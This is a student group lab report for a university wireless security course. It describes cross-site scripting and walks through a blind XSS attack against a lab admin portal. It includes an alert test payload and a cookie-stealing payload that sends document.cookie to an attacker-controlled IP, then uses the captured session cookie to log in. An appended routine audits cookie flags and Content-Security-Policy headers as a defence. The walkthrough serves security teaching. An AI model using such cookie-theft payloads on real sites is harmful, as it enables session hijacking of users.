
Cnise4 Group2..

Uploaded by

dicoz dipha

THE UNIVERSITY OF DODOMA

COLLEGE OF INFORMATICS AND VIRTUAL EDUCATION

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING


COURSE NAME: WIRELESS SECURITY
COURSE CODE: IA 423
INSTRUCTOR: Ms. Zubeda Kilua
GROUP ASSIGNMENT 1: GROUP 2

S/N NAME REGISTRATION NO PROGRAMME


1. MILLENA A. SALEMA T21-03-04248 BSc.CNISE
2. FELIX R. KULUCHUMILA T21-03-05870 BSc.CNISE
3. ERICK A. JOSEPHAT T21-03-07757 BSc.CNISE
4. MALIATABU R. MIGANYALO T21-03-09362 BSc.CNISE
5. PHILIMON S. MBUNDA T21-03-15075 BSc.CNISE
6. ACHILEUS G. NICHOLAUS T21-03-04874 BSc.CNISE
7. SALEHE JUMA KITINE T/UDOM/2020/05244 BSc.CNISE
8. JAMES E. MACHIWA T/UDOM/2020/05229 BSc.CNISE
9. ROGER K. RESPIDIUS T21-03-08848 BSc.CNISE
10. ANGEL EWALD GODFREY T21-03-07484 BSc.CNISE
WIRELESS SECURITY LAB:

VULNERABILITY: CROSS-SITE SCRIPTING (XSS)

Cross-site scripting (XSS) is a web security vulnerability that allows attackers to inject
malicious scripts into websites, which are then executed by the victim's browser. These
scripts can steal user data, hijack sessions, or redirect users to malicious websites. XSS
attacks often occur because websites don't properly sanitize user input before displaying
it, allowing attackers to insert code that can be executed by other users.

To check whether a cross-site scripting vulnerability exists, we can try a basic payload
such as <script>alert("group4")</script>. This is a simple script that just gives a popup
of "group4", which proves the vulnerability exists. But also, in some most cases we
might get this script works in some other environments since, which means that blind

How XSS Attacks Work:


• Injection:
Attackers inject malicious scripts into a website, often by exploiting vulnerabilities in
how user-provided data is handled.
• Delivery:
The attacker's script is then delivered to other users who visit the vulnerable website,
usually in the form of a link or embedded in a page.
• Execution:
When a user visits the website, their browser executes the injected script, believing it
to be legitimate code from the site.
• Exploitation:
The attacker's script can then access user data, modify the website, or redirect the user
to a malicious site.

Types of XSS:

• Stored XSS:
The malicious script is stored on the server and is delivered to every user who visits the
website, for example through a comment section on a blog or social media.
• Reflected XSS:
The attacker injects malicious code into a request sent to the server, which is then
reflected back in the response to the victim's browser.
• DOM-based XSS:
The malicious code is executed in the victim's browser by manipulating the page's
Document Object Model (DOM), often by exploiting vulnerabilities in JavaScript code

In this lab we are going to demonstrate a simple blind cross site scripting and how to
reproduce it.
LAB EXPLOITATION AT SERVER LEVEL

STEP 1: Identifying an endpoint that is vulnerable to XSS.

As you can see above, we have a running web service that provides many different
endpoints. One of them is a login page for which we have no credentials, so we might not
be able to gain access to the admin portal, but with XSS we might try to steal the admin's
cookies and log in as admin. To find the vulnerable endpoint we might need to find
all endpoints; for now we will go straight to the endpoint that.

We have an admin portal that requires credentials to log in; we can take
advantage of XSS to obtain an admin session and log in using the admin's cookie.

STEP 2: After testing different types of XSS payloads, we found that a
message box was vulnerable to blind XSS. To reproduce this, we need to test
something like this.

STEP 3: Detecting blind XSS with a callback to our computer. We made a simple script
that pings back to our computer so that we can see whether there is a vulnerable endpoint.

After clicking the send button, we receive a simple callback to our computer, as shown
below. What we have done here is set up a simple Python server on our local computer,
and in the web page above we used our local computer's IP address.

Now that we have a callback to our computer, we can try to escalate the XSS and steal
the admin's cookies. To do this we are going to create a simple malicious PHP script as
well as a malicious JS script that will be responsible for stealing a cookie, as follows.
The index.php script is a default landing page that we will send to the admin. The
script.js file will execute when the admin clicks our script, and it will send back the
cookie for the session he has logged in with. Another thing we need here is a simple
PHP server that is ready to receive the callback with the admin's cookie.

STEP 4: We are going to modify the payload we used earlier to detect the blind XSS
vulnerability, like this.

payload: new Image().src='http://10.10.15.160/index.php?c='+document.cookie.


When we click send again, we receive the cookie on the server we set up earlier.

Now that we have the admin cookie, we can use it to log in; you can use a cookie
editor or the browser as well.
GET /index.php?c=session=fcfaf93ab169bc943b92109f0a845d99

As we can see in the image above, we are in the admin panel, which is a gold move we
made with XSS.
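
The cookie theft in Step 4 depends on the session cookie being readable through document.cookie and on the browser being allowed to request an image from another host. The added example below is not part of the original lab; its function names, finding codes and sample headers are constructed, and only the cookie name `session` comes from the request shown above. It audits a response for the header settings that close both gaps.

```javascript
// Added example: function names, finding codes and sample headers are constructed.

// Parse one Set-Cookie header line into its name and lower-cased attribute names.
function parseSetCookie(line) {
  const [pair, ...attrs] = line.split(';').map((s) => s.trim());
  const flags = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  return { name: pair.slice(0, pair.indexOf('=')), flags };
}

// Parse a Content-Security-Policy value into { directive: [sources] }.
function parseCsp(value) {
  const policy = {};
  for (const part of value.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Report the gaps that let an injected script read the session cookie
// and send it to another host in an image request.
function auditResponse(headers, sessionCookie) {
  const findings = [];
  const cookie = [].concat(headers['set-cookie'] || [])
    .map(parseSetCookie).find((c) => c.name === sessionCookie);
  if (cookie && !cookie.flags.has('httponly')) findings.push('COOKIE_NO_HTTPONLY');
  if (cookie && !cookie.flags.has('secure')) findings.push('COOKIE_NO_SECURE');
  if (cookie && !cookie.flags.has('samesite')) findings.push('COOKIE_NO_SAMESITE');

  const cspValue = headers['content-security-policy'];
  if (!cspValue) return findings.concat('CSP_MISSING');
  const csp = parseCsp(cspValue);
  const script = csp['script-src'] || csp['default-src']; // default-src is the fallback
  const img = csp['img-src'] || csp['default-src'];
  if (!script || script.includes("'unsafe-inline'")) findings.push('CSP_INLINE_SCRIPT_ALLOWED');
  if (!img || img.some((s) => ['*', 'http:', 'https:'].includes(s))) findings.push('CSP_IMG_ANY_HOST');
  return findings;
}

// Constructed sample responses: a weak login response and a hardened one.
const weak = { 'set-cookie': ['session=EXAMPLEVALUE; Path=/'] };
const hardened = {
  'set-cookie': ['session=EXAMPLEVALUE; Path=/; HttpOnly; Secure; SameSite=Strict'],
  'content-security-policy': "default-src 'self'; script-src 'self'; img-src 'self'",
};
console.log(auditResponse(weak, 'session'));
console.log(auditResponse(hardened, 'session'));
```

HttpOnly keeps the session cookie out of document.cookie, and the restrictive img-src and script-src directives limit what an injected script can run and where it can send data; neither replaces output encoding of the stored message.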
